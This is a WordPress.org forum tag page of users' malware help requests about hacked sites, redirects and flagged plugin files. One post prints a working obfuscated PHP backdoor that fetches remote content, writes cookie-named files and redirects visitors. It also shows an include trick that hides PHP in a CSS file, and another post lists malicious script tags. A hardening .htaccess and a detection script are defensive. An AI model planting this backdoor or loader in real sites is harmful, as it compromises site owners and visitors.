Channel: Topic Tag: malware | WordPress.org

js.donatelloflowfirstly. ga not removed from DB

Hello,

We have been (paying) users of GOTMLS for a while, but today we realised that it’s not working on most of our websites that have been infected with this new virus js.donatelloflowfirstly. ga

Could you tell us if you have a plan in mind to clean it correctly?

Kind Regards


Malicious code on website – need FTP access

Hi, I have malicious code on my website. I booked Sucuri https://sucuri.net/ to delete the malcode but they can't access the page. They need FTP access. Is there any possibility to create FTP access for a WordPress.org site? Or can the cleaning of the malware be done by WordPress itself?

I also tried to check the installed plugins to see if there is any issue right now. Unfortunately, while logging into wp-admin it's asking me to update the database. Due to the malware I did not want to do it. Do you think this is unrisky?

Thank you so much for a fast feedback!
Patrick

Malware?

Hello to anyone,
my host provider informed me with this message:

Hello,

ImunifyAV scanned your websites automatically for malware. At least one of them is infected and needs your action:

reteinformatica.biz 1 file infetto
/wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

negozio.reteinformatica.biz 1 file infetto /wp-content/plugins/w3-total-cache/inc/lightbox/support_us.php

Remove the malware with one-click

Best regards,
Plesk and ImunifyAV Teams

Same thing with another site I have with other domain.

Plugin Malware/Backdoor

Hi,

Please can you explain why you have a backdoor that has been detected as Malware in the latest update of Wp Hide?

wp-content/plugins/wp-hide-security-enhancer-pro/modules/components/firewall-setup.php

Many thanks

anonymousfox

The malware anonymousfox has attacked several of my sites hosted by cPanel.

The malware will overwrite the main username with anonymousfox.
The malware creates an e-mail address in cPanel.
The malware creates PHP files, e.g. xkjsfnadl.php, in WordPress.

How do I proceed with the removal?

I tried:
In phpMyAdmin, I rewrote the main username and reset the password.
Changed all passwords.
Removed malware scripts.
Deleted the email address.

The malware was back within 24 hours.

I have 10 sites infected.
Thanks.

Malware Warning on Updraft files

I am getting the following Malware related warning for the Updraft Plus plugin. Please check if this is something to be concerned about.
1. Path: /wp-content/plugins/updraftplus/updraftplus/vendor/guzzle/guzzle/phar-stub.php

2. /wp-content/plugins/updraftplus/updraftplus/vendor/kriswallsmith/assetic/src/Assetic/Extension/Twig/TwigFormulaLoader.php

3. /wp-content/plugins/updraftplus/updraftplus/vendor/phpseclib/phpseclib/phpseclib/Crypt/Base.php

Note: These warnings were from a Security Plugin named CleanTalk.

How to Report Malware that WordFence is Missing

Hi Folks

Our server malware detection has found a number of sites that use WordFence but have had Malware installed on them without WordFence picking it up.

Exploit has been installed by modifying wp-con-PHP and is coming up as mr.dellationx196.bogor.blackhat.1

I am not putting the full site links on here due to security and further potential exploit, but here are the locations of the malware:

/public_html/staging/wp-content/themes/twentynineteen/wp-con.php (Dormant Theme)
/public_html/wp-content/themes/MinimalChild/wp-con.php (active theme)

Any ideas why WordFence is not picking these up?

Regards

When visiting Website visitors get redirected

When someone visits my website by typing in the web address, they are getting redirected.
The website must be hacked but I am not sure what I need to do to stop this from happening. I have installed Wordfence and set it up but my website continues to be redirected.

Any help to solve this problem would be greatly appreciated.


Useless

They don’t have any technical knowledge and simply waste our time. They know good marketing strategies and their website came first on search results.

SUSPECTED: Malware

Hi,

I assume malware is being loaded through this plugin:
<script src='https://longtailmagic.com/domain/i.php?ver=5.5.1' id='hello_newscript0-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>
<script src='https://jadsupport.com/includes/i.php?ver=5.5.1' id='hello_newscript1-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>
<script src='https://magaliefonteneau.com/wp-content/i.php?ver=5.5.1' id='hello_newscript2-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>
<script src="https://futuracp.com/images/i.php?ver=5.5.1" id='hello_newscript3-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>
<script src="https://casualwoodcreations.com/images/i.php?ver=5.5.1" id='hello_newscript4-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>
<script src='https://s3.tradingview.com/tv.js?ver=5.5.1' id='tv-common-js-js' type="0404c25a3b8094c261f60e71-text/javascript"></script>

https://magaliefonteneau.com/wp-content/i.php?ver=5.5.1 contains malware.
Be cautious when installing this plugin.

Malware

WordPress site redirects to another link when clicked First time

I am experiencing website redirection on my website when clicked through Google search results only for the new user.

For example:

1. Go to Google.com (in a NEW window where there is no previous history of cflowapps.com)
2. Search for “Cflow”
3. Click on www.cflowapps.com
4. Click anywhere on the page, it redirects to spam site

This happens only for the first time.

This plugin was used to add malware to my website

This plugin was used to add malware to my website.

It added in a string eval of lots of numbers which equated to a redirect to a spam site.

It loaded this script:
developerstatss.ga
Which redirected to this site:
https://declarebusinessgroup.ga
Which then redirected to this site:
https://sinistermousemove.art

Uninstalling this plugin fixed the issue.

Malware!


How to recover from malware attack?

My WordPress site (built with Divi) was hacked and malware spread throughout that site and the others I have. I located all infected files (index.php, htaccess, etc.) and deleted them so that my domains would be unlocked by my host. Then, I copied all the remaining files in their folder structure. Is there any way I can use those to restore my website? If not, can they give me the images and text I used, so I can rebuild it that way?

(Yes, I have a backup, but it is located in another country. I was on a short trip when the world changed — COVID-19 –, and I am still unable to return to get it.)

Thanks!

Malware found in a site, removed it now its coming back – Steps I’ve taken

Hi all,
First off, thank you for chiming in.
I am a hobbyist WP site builder for my friends and family.

This is my first time experiencing malware on my shared Bluehost server, cPanel etc.
I moved an old site of one of my mates across to my server and enabled SSL on it. This is where I think the first infection came from.
It was not until a few weeks ago that I got a notification that malware was detected on my site. I asked my host to scan for me and found an increasing number of infections each time I scanned.
So I got to work. I used Wordfence (free and premium, depending on the site) to scan my site, as the hosting provider threatened to shut down my account unless the next scan came back clean.

I found a .php with a .htaccess file in these locations on most of the sites on the server

wp-admin/js/widgets/index.php
wp-content/uploads/2020/02/index.php
wp-admin/css/colors.index.php
wp-content/uploads/2019/index.php
wp-includes/Requests/Exceptions/Html5.php
wp-content/themes/My theme/header.php – affected All themes installed on each site

These were infected with
SL-PHP-BACKDOOR-GENERIC-bca.UNOFFICIAL
or
SL-PHP-INJECTOR-1-fmd.UNOFFICIAL
or
A file changed as malicious

For most of my sites, I run a child theme on theme
I inspected header.php before and after to try and find the new injected code.
To do this I downloaded a clean version of the theme, then copied and pasted the bad header.php and good header.php into Diffchecker
Link https://www.diffchecker.com/ to analyse the code

I found a load line right at the top of the bad header.php

Top of the bad header.php

<?php @include_once 'slider.css'; ?><?php
/**
 * The Header for our theme.

Top of the good header.php

<?php
/**
 * The Header for our theme.

From this, I could see the header.php was loading another file
slider.css –
<?php @include_once 'slider.css'; ?>

I looked deeper into my theme files and found it. I also noticed this file was not included in my theme at all, because I had a child theme set up. Where I found the slider.css I also found 5 new files that did not exist before.

public_html/exampledomain/wp-content/themes/my-child-Theme

.htaccess
404.php
fuctions.php
html5.php
slider.css
styles.css

In the modified 404.php file I can see it's loading the html5.php file
@include_once 'html5.css'; get_header(); ?>

<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package WordPress
 * @subpackage WordPress_Theme
 * @since WordPress Theme 1.0
 */

@include_once 'html5.css'; get_header(); ?>

	<div id="primary" class="content-area">
		<main id="main" class="site-main" role="main">

			<section class="error-404 not-found">
				<header class="page-header">
					<h1 class="page-title"><?php _e( 'Oops! That page can&rsquo;t be found.' ); ?></h1>
				</header><!-- .page-header -->

				<div class="page-content">
					<p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?' ); ?></p>

					<?php get_search_form(); ?>
				</div><!-- .page-content -->
			</section><!-- .error-404 -->

		</main><!-- .site-main -->
	</div><!-- .content-area -->

<?php get_footer(); ?>

In the random Html5.php files I found this code – about line 250 – this file was not original in the child theme. Also, all upload dates were changed to random dates.
It’s beyond my skill set to understand what it’s doing.

[hidden] {
	display: none;
}*/ error_reporting( 0 ); if( function_exists( 'is_user_logged_in' ) ) { if( is_user_logged_in() ) return; }
$_Post_Wi = 'wp-includes'; $_Post_404 = '/404/'; $_Post_Ts = 'tps'; $_Post_In = '.info';
	$_Post_Eq = '='; $_Post_An = '&'; $_Post_Th = 'ht';
		$Link_Id = $_Post_Th . $_Post_Ts . ':' . '//' . $_Post_Wi . $_Post_In . $_Post_404;
$User_Id = isset( $_SERVER['HTTP_USER_AGENT'] ) ? urlencode( $_SERVER['HTTP_USER_AGENT'] ) : '';

	$_id_ = $_COOKIE; if( !empty( $_id_['div_type'] ) ) { $Link_Id .= $_Post_Wi;
if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
	$Post_Id = file_get_contents( $Link_Id ); file_put_contents( $_id_['div_name'].$_id_['div_type'], $Post_Id ); echo( $User_Id.'
' ); return; } if( strstr( $User_Id, 'WordPress.com' ) && strstr( $User_Id, 'wordpress.com' ) ) { echo( $User_Id.'
' ); return; }

$Post_Error = strstr( $_SERVER['HTTP_HOST'], '127.0' ) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
	$Link_Id .= '?' . 'post' . $_Post_Eq . urlencode( $Post_Error.$_SERVER['REQUEST_URI'] ) . $_Post_An .
'id' . $_Post_Eq . urlencode( $_SERVER['REMOTE_ADDR'] ) . $_Post_An . 'user' . $_Post_Eq . $User_Id;

if( function_exists( 'curl_init' ) ) { $_div_ = curl_init( $Link_Id ); curl_setopt( $_div_, CURLOPT_HEADER, 0 );
	curl_setopt( $_div_, CURLOPT_CONNECTTIMEOUT, 11 ); curl_setopt( $_div_, CURLOPT_TIMEOUT, 11 );
		curl_setopt( $_div_, CURLOPT_RETURNTRANSFER, 1 ); $Post_Id = curl_exec( $_div_ ); curl_close( $_div_ ); } else
$Post_Id = file_get_contents( $Link_Id ); if( strstr( $Post_Id, $_Post_Wi.$_Post_In ) ) die( header( $Post_Id ) ); ?>

All these files contained shit code that was not the same as the original child theme for the site.
I deleted them all and re-uploaded the child theme and main theme.
I thought I had cleaned out all bad files. All scans were coming back clean so I was happy. “More below: the infection came back with files reappearing in plain sight after they were deleted.”

All was good for about 2 weeks. I had fixed all my sites, removed old ones and did a full clean-up. Changed all passwords. 2FA for the server etc.

I found that the infection had come back. I went through my process again and fixed all the sites. Removed all code from bad areas etc.
I decided to try to harden my uploads area. Details below.
And in front of me, I found wp-file-manager-pro pop up in the uploads folder. I changed my passwords etc. again and deleted the file, only for it to come right back as soon as I refreshed the page. Even if I changed the permissions to 444 (read), the folder came back. I managed to grab a zip of it and download it.

It contained
FM_backup – filemanager I could not see any creation date – No file permission
index.php
index.html

When I went to look inside the index.html and index.php they were empty.
If I renamed the folder wp-filemanager-pro and deleted it, it came back with the same name.
“How do I figure out what is recreating this?”

Hardening my .htaccess files in the main directory and uploads directory

Note: I’m not an expert. This is what I found from many sources on the web. “Any additions or changes, let me know.”

I have come up with this .htaccess file to block a lot of things. Most parts of the code have a description; one I’m not sure about. Please see below.
Another note: .htaccess files should have permissions of 444.

#.htaccess file for the main level of the subdomain

# BEGIN rlrssslReallySimpleSSL rsssl_version[3.3.5]
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTPS} !=on [NC]
RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
</IfModule>
# END rlrssslReallySimpleSSL

# BEGIN WordPress   you need to find out if this is ok
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# Wordfence WAF  -  wordfence needs to be installed and enabled 
<Files ".user.ini">
<IfModule mod_authz_core.c>
	Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
	Order deny,allow
	Deny from all
</IfModule>
</Files>
# END Wordfence WAF

# This blocks author scans in .htaccess in your root directory.
# An example is http://yourdomain.co.nz/?author=2 from a Wordfence scan
# BEGIN block author scans
 RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
 # END block author scans

# Block WordPress xmlrpc.php requests in .htaccess. This blocks remote access to the site on phones. 
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

<IfModule mod_alias.c>
RedirectMatch 403 /(.*)/xmlrpc\.php$
</IfModule>

# Disable directory browsing, for example https://yoursite.co.nz/wp-content/plugins - stops directories from being viewable

Options -Indexes

I have also created one for the uploads directory.

Note: I’m not an expert. This is what I found from many sources on the web. “Any additions or changes/mistakes, let me know.”

# Start Wordfence code execution protection - Blocks code from running - Remember to put 444 security on the .htaccess file in the upload directory
<IfModule mod_php5.c>
php_flag engine 0
</IfModule>
<IfModule mod_php7.c>
php_flag engine 0
</IfModule>
AddHandler cgi-script .php .phtml .php3 .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
# END Wordfence code execution protection

# This completely blocks all files in the upload directory
<Files ~ ".*\..*">
	Order Allow,Deny
	Deny from all
</Files>

# After that add file extensions you want to allow access - only files that can be opened - you must add extensions if you want to use them
<FilesMatch "\.(jpg|jpeg|jpe|gif|png|mp4|pdf)$">
	Order Deny,Allow
	Allow from all
</FilesMatch>

# END File Extension Block

Thank you for your time chiming in. I am a hobbyist and finding this very hard.
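
A read-only check for the pattern described in the post above: a theme file pulling in PHP through `@include_once 'slider.css'`, PHP hidden in asset files, and PHP files under uploads. This is an added example, not code from the original post; the function names, reason labels and sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# include/require of a quoted literal path; group 2 is the extension.
INCLUDE_RE = re.compile(
    rb"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+\.(\w+))['"]""")
PHP_EXTS = {b"php", b"phtml", b"inc"}
PHP_OPEN = re.compile(rb"<\?php", re.I)
ASSET_EXTS = {".css", ".png", ".jpg", ".jpeg", ".gif", ".ico"}


def scan_tree(root):
    """Return sorted (relative_path, reason) findings for review, not deletion."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)
            except OSError:
                continue
            if ext in (".php", ".phtml"):
                if "/uploads/" in "/" + rel:  # uploads is meant for media
                    findings.append((rel, "php-in-uploads"))
                for m in INCLUDE_RE.finditer(data):
                    if m.group(2).lower() not in PHP_EXTS:
                        target = m.group(1).decode("latin-1")
                        findings.append((rel, "includes-non-php:" + target))
            elif ext in ASSET_EXTS and PHP_OPEN.search(data):
                findings.append((rel, "php-code-in-asset"))
    return sorted(findings)


def build_sample(root):
    """Write a constructed sample tree using file names from the post."""
    files = {
        "wp-content/themes/child/header.php":
            b"<?php @include_once 'slider.css'; ?><?php\n/** The Header */\n",
        "wp-content/themes/child/slider.css": b"<?php /* placeholder */ ?>\n",
        "wp-content/themes/child/style.css": b"body { margin: 0; }\n",
        "wp-content/themes/child/footer.php": b"<?php include 'nav.php'; ?>\n",
        "wp-content/uploads/2020/02/index.php": b"<?php // placeholder\n",
        "wp-content/uploads/2020/02/photo.jpg": b"\xff\xd8\xff\xe0JFIF",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_tree(tmp):
            print(f"{reason:40} {rel}")
```

Includes built by string concatenation are not matched, and some plugins place empty index.php files in uploads, so each finding needs a manual look before anything is removed.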

Got hacked

Hi, my site was one of thousands that got hacked in September. I deleted the plugin and, one month later, I still haven’t been able to get rid of some hidden spam links that the virus injects on my site. Google rejects my ads saying I have those “ghost” links which I can’t find. I hired a team of people with NO luck. Do you know anything about this? Is there any way you can assist me?

Owned by Automattic, but not updated for 3 years!

Is this plugin still working in WP 5.5?
Is it still reliable?
It still gets recommended here: https://www.wpstuffs.com/detect-malicious-code-wordpress-themes-plugins/

We often have sites from agencies to fix which seem to be using Free downloaded commercial themes and Nulled Plugins. They often cleaned the problems up pretty well but sometimes they miss parts and the sites or actually complete servers seem to be turned over to hackers.

Saying this the easiest way to secure WordPress and to make WordPress safer would actually be to provide all commercial themes and plugins also as a CLEAN(edup) version – but really cleaned up version on a trusted site. Only that way Networks like WP-VCD could be stopped with their malicious sites and finally WordPress would be made much securer. Instead of charging for 1 sites, 5 sites etc licenses which actually are not compliant with GNU GPL anyway as GPL says you can modify, copy, and even redistribute the code as long as you keep the same licenses in place. It would be much better that they focus on their reputation and helping the community of all to use cleaned code and benefit from support and more project requests due to their much better visibility.

Anyway, that is not the question here – we still have to deal with those malicious sites and clean up the mess. So what plugins to do so are still working in 5.5, as this one hasn’t been updated by even Automattic!!! for 3 years – does not really speak for their reputation either, or?

If I migrate with this tool, will I bring malware with me?

I have a hacked site (php backdoor I believe) Was wondering… if I start with a fresh load of WP on another server, then use your migration plugin… will I end up bringing the malware with me to the new server?

Thanks for your help-
